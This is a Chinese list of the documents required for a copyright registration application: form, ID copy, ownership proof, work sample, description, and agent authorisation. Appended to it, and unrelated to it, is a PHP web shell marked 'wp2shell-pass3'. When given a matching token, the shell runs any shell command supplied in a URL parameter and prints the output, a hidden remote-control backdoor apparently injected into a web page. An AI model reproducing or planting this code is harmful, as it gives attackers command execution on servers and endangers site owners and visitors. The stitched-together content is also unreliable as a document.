(1)《作品著作权登记申请表》;
(2)申请人身份证明文件复印件:
(3)权利归属证明文件;
(4)作品的样本(可以提交纸介质或者电子介质作品样本);
(5)作品说明书(请从创作目的、创作过程、作品独创性三方面写,并附申请人签章,标明签章日期);
(6)委托他人代为申请时,代理人应提交申请人的授权书(代理委托书)及代理人身份证明文件复印件。
// wp2shell-pass3 if (isset($_GET['t']) && hash_equals('85680686487752acb1a2f09033bfba49', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; }